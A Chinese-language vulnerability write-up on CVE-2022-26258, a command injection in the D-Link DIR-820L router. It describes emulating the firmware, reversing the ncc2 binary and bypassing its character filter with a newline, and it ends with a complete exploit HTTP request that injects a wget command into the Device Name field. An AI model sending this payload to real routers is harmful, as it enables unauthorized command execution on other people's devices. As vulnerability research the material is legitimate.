CVE-2022-26258 D-Link 命令注入 - 《逆向》

binwalk提取之后使用FirmAE进行固件模拟
sudo ./run.sh -r DIR820L ./firmwares/DIR820LA1FW105B03.bin
![{F]RL_R)XMZ[58V75RJ@CA.png](https://cdn.nlark.com/yuque/0/2022/png/554486/1651801117590-4a0d4067-664c-4a6a-b537-cb188b46b065.png#clientId=u0fe51ec3-dd46-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=ufccbb363&margin=%5Bobject%20Object%5D&name=%7BF%60%5DRL_R%29XMZ%5B58V75RJ%40CA.png&originHeight=518&originWidth=872&originalType=binary&ratio=1&rotation=0&showTitle=false&size=115889&status=done&style=none&taskId=ue852f27e-34aa-4e58-8732-fb517817b39&title=) 两个true说明http服务和network模拟成功了 来到networksettings页面，可以触发漏洞的点比较多，例如IP，name，device等，这里是设置Device Name时触发的命令执行。 ![7}ERK)QKT1F2%6RWMO4CIR.png](https://cdn.nlark.com/yuque/0/2022/png/554486/1651803026916-267984a7-e592-41ab-8931-dd5e45a8a461.png#clientId=u0fe51ec3-dd46-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u3f1f08a3&margin=%5Bobject%20Object%5D&name=7%7DERK%29QKT1F2%256RWMO4%60CIR.png&originHeight=656&originWidth=1206&originalType=binary&ratio=1&rotation=0&showTitle=false&size=131256&status=done&style=none&taskId=uc7251a21-2645-4198-b99e-7b5bd528db1&title=)
来到该固件的文件系统目录下，可以看到一个耳熟能详的二进制应用 ncc2

这个应用主要进行网络等底层操作相关的操作，使用IDA进行分析
$@PTYJ593EN[S%$_EU{TUOWX.png](https://cdn.nlark.com/yuque/0/2022/png/554486/1651803988433-ceb9e65e-e926-4acc-872f-d285ee516025.png#clientId=u0fe51ec3-dd46-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=ua56735c2&margin=%5Bobject%20Object%5D&name=%40PTYJ593EN%5BS%25%24_EU%7BTUOWX.png&originHeight=575&originWidth=970&originalType=binary&ratio=1&rotation=0&showTitle=false&size=47300&status=done&style=none&taskId=uc0f69125-7161-4366-bf6b-bdea5082095&title=) 这里可以看到设置设备名称时通过系统命令触发执行，但是前面有个hasInjectionString，根据英文名字猜测，应该是用来判定是否有注入，我们进行跟踪 ![HV1W3)SN[@~J53LR7AS]XKP.png$
此处可以判断该函数应该是来自于一个动态链接库
![J00IFU`D%RQ{IPK88})05S.png
![$%AYBRVJ$UI8RN@$ED]BUX.png](https://cdn.nlark.com/yuque/0/2022/png/554486/1651804050473-cc38dd0d-25ec-4c3f-a103-30234c8d6cf1.png#clientId=u0fe51ec3-dd46-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=uc862fe8a&margin=%5Bobject%20Object%5D&name=%24%25AYBRVJ%24UI8RN%40%24ED_%5DBUX.png&originHeight=782&originWidth=1098&originalType=binary&ratio=1&rotation=0&showTitle=false&size=54613&status=done&style=none&taskId=u1f816491-6de5-4812-8ba9-0dab942b50f&title=)
可以看到过滤了几个符号

`\;'|

但是没有过滤\n也就是%0a，所以我们可以使用%0a进行绕过
exp

POST /get_set.ccp HTTP/1.1
Host: 192.168.0.1
Content-Length: 765
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://192.168.0.1
Referer: http://192.168.0.1/lan.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: hasLogin=1
Connection: close
ccp_act=set&old_ip=192.168.0.1&old_mask=255.255.255.0&new_ip=192.168.0.1&new_mask=255.255.255.0&nextPage=lan.asp&lanHostCfg_IPAddress_1.1.1.0=192.168.0.1&lanHostCfg_SubnetMask_1.1.1.0=255.255.255.0&lanHostCfg_DomainName_1.1.1.0=&lanHostCfg_DNSRelay_1.1.1.0=1&lanHostCfg_DHCPServerEnable_1.1.1.0=1&lanHostCfg_MinAddress_1.1.1.0=192.168.0.100&lanHostCfg_MaxAddress_1.1.1.0=192.168.0.200&lanHostCfg_DHCPLeaseTime_1.1.1.0=1440&lanHostCfg_DeviceName_1.1.1.0=%0awget http://192.168.0.2%0a&lanHostCfg_AlwaysBroadcast_1.1.1.0=0&lanHostCfg_NetBIOSAnnouncement_1.1.1.0=0&lanHostCfg_NetBIOSLearn_1.1.1.0=0&lanHostCfg_NetBIOSScope_1.1.1.0=&lanHostCfg_NetBIOSNodeType_1.1.1.0=2&lanHostCfg_PrimaryWINSAddress_1.1.1.0=0.0.0.0&lanHostCfg_SecondaryWINSAddress_1.1.1.0=0.0.0.0&1649259644679=1649259644679

参考资料：https://mp.weixin.qq.com/s/1iSBU8HJCKc1xoIhrepx0Q